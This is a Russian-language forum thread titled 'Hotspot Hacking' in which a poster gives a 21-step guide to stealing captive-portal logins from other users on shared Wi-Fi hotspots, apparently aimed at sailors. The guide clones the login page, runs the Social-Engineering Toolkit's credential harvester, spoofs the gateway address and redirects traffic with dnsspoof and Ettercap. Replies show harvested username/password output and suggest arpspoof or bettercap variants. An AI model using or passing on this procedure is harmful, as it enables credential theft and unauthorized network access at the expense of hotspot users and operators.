Взлом Хотспотов (Hotspot Hacking)

Может кому-то будет интересна тема взлома хотспотов.
Ломаю по методу с этого видео
Написал инструкцию на русском, удалил не нужные действия, уже практически не заглядываю в неё при необходимости собрать новую порцию пар логин/паролей))
Но скажу, прежде чем получилось взломать, проделал все описанное в видео раз 50...
Если будут вопросы, задавайте, буду рад помочь.
(актуально для моряков)

Spoiler: Инструкция по взлому Хотспотов

1.Создаём в домашней директории папку "a".
2.Сохраняем стартовую страницу хотспота как index.html в созданную папку.
3.Набираем произвольный логин и пароль, жмем вход, как напишет что нет такого юзера, сохраняем страницу как post.html
4.Заходим в свойства соединения, копируем адрес "default route" (маршрут по умолчанию),
в свойствах IPv4 выставляем DHCP в ручной режим и прописываем в адрес и шлюз скопированный "default route", маску подсети 255.255.255.0
5.Отключаемся от хотспота
6.Открываем редактором Leafpad страницу index.html, делаем поиск по слову "md5", удаляем все содержимое начиная со <script> и заканчивая </script> включительно.
7.Делаем поиск по слову "action" и меняем адрес помещённый в кавычки на "post.php", так делаем со всеми строками содержащими слово "action".
8.Пункты 6 и 7 повторяем и для сохранённой страницы post.html
9.Запускаем терминал, в командной строке набираем "setoolkit"
10.Если спросит: "Do you want to enable bleeding-edge repos for fast updates" - отвечаем "no"
11.На вопрос: "Do you agree to the terms of service" отвечаем "y" и попадаем в главное меню Social-Engineering Toolkit
12.Далее по очереди: (1,2,3,3)
set>1 (Social-Engineering Attacks)
set>2 (Website Attack Vectors)
set>:webattack>3 (Credential Harvester Attack Method)
set>:webattack>3 (Custom Import)
set>:webattack> IP address for the POST back in Harvester/Tabnabbing: (вставляем адрес "default route")
set>:webattack> Path to the website to be cloned:/root/a/index.html (прописываем путь до index.html)
set>:webattack> URL of the website you imported: (оставляем пустым)
13.Перед тем как запустить apache, подключаемся к хотспот
14.Отвечаем "y", запускается сервер Apache2
15.Идем в созданную папку с сохраненными файлами, копируем все файлы.
16.Заходим в директорию "var" -> "www" -> "html", удаляем файл "index.html" и вставляем наши скопированные файлы
17.Открываем редактором файл "post.html", копируем все содержимое, закрываем файл.
18.Открываем редактором файл "post.php" и после знака ">" в конце первой строки, с новой строки вставляем все скопированное содержимое предыдущего файла, сохраняемся.
19.Открываем терминал, набираем в командной строке по очереди:
chown -R www-data:www-data /var/www/html
chown -R www-data:www-data /var/www/html/index_files
chown -R www-data:www-data /var/www/html/post_files
20.Открываем ещё один терминал, набираем "dnsspoof -i wlan1" (или wlan0, у кого один wifi-адаптер)
21.Запускаем "Ettercap" -> Sniff -> Unified sniffing -> выбираем наш WiFi адаптер и ждём паролей, которые будут писаться в файл harvester_xxxx....)

https://mega.nz/#!V1N1SYwT!N0GAuoHftIH8U2umfORN6sVN0Qr_0iz5XSnxeOr8024

 

Здравствуйте, можете описать за счет чего происходит взлом? Как перехватываються логины и пароли внутри сети? Нужно ли чтобы клиент подключенный к т.д. был нам видим?

 

c помощью dnsspoof и ettercap. Траффик заворачивается на вас. с фейковой страницей.

 

Инструкции не хватает вашей, раз уж видео не ваше.

 

я бы с удовольствием выгрузил свое видео, если бы была такая возможность, пока к сожелению её нет...
ps. инструкцию прикрепил.

 

Ну постарайся при первой же возможности,народу будет интересно

 

Я думаю этот вопрос уместней было бы задать автору видео, но от себя скажу что в файл harvester пары логин/пароль пишутся только с назначением от гугл.ком

Spoiler: harvester

Array
(
[dst] => https://www.google.com
[popup] => true
[username] => 2hb
[password] => kw8
)
Array
(
[dst] => https://www.google.com
[popup] => true
[username] => eyx
[password] => ev9
)
и т.д.

 

Вам не кажется как то тупо он поменял свой АйПи на адрес шлюза?
АРПСпуфф? Не не слышал...
Мне кажется где то подъёбка... если не прав поправьте.

 

главное что метод работает на 100%
может продемонстрируете нам свой метод сбора логин/паролей в сети хотспот?

как станем к причалу, обязательно выгружу, сейчас скорость не ахти, и срывы соединения

 

https://forum.antichat.ru/threads/415034/

 

Легко...

apache2+setoolkit+arpsppof+dnsspoof

 

а есть возможность сделать видео процесса, или хотябы иструкцию, я бы опробовал альернативу на реальных хотспотах?!
думаю будет полезно для развития темы!

 

пока не успел проверить на местных спотах, да и поиском по "hotspot" её не заметил...

 

Ну попробуй и ты метод user100,я пробовал, ничего не получилось.Если авторизация простая (http POST),то проще всего запустить bettercap, результат 100% и сеть не сильно вешает.Форвардинг там лучше работает чем в etercap.А твой метод,я так понимаю,работает и с ssl авторизацией?